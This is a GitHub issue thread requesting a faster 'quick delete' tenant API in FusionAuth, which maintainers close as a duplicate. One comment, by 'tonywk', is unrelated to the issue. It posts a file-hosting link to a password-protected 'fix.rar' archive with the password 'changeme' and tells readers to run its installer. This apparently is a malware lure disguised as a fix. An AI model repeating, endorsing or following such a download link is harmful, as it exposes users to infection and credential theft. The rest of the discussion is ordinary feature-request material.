### ISSUE TITLE
Add a 'quick delete' tenant API

### ISSUE THREAD

**Issue by mooreds** [FusionAuth/fusionauth-issues#2849]
### Problem

We tell users to test data loading for their migration efforts and to use a test tenant to do so. This works fine, except deleting a test tenant can take a long long time. This is unexpected.

### Solution

It would be great to have a 'quick delete' of tenant that could be faster. This would ignore certain restraints like webhooks to speed up the deletion process.

### Alternatives/workarounds

* Document deletion of tenant duration: https://github.com/FusionAuth/fusionauth-site/pull/3221
* Do the testing on a throwaway server/deployment that you can destroy rather than delete tenants

### Additional context

Internal: https://inversoft.slack.com/archives/C051S8N8E/p1724512713854619?thread_ts=1724253851.071399&cid=C051S8N8E

This has been an unpleasant surprise to customers loading millions of users into FusionAuth cloud. It's not such a big deal for self-hosted customers who can drop a database.

### Community guidelines
All issues filed in this repository must abide by the [FusionAuth community guidelines](https://fusionauth.io/community/forum/topic/1000/code-of-conduct).

### How to vote
Please give us a thumbs up or thumbs down as a reaction to help us prioritize this feature. Feel free to comment if you have a particular need or comment on how this feature should work.

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by robotdan** [comment]
Is this a duplicate of https://github.com/FusionAuth/fusionauth-issues/issues/2151?

**Comment by mooreds** [comment]
Yes. Closing.
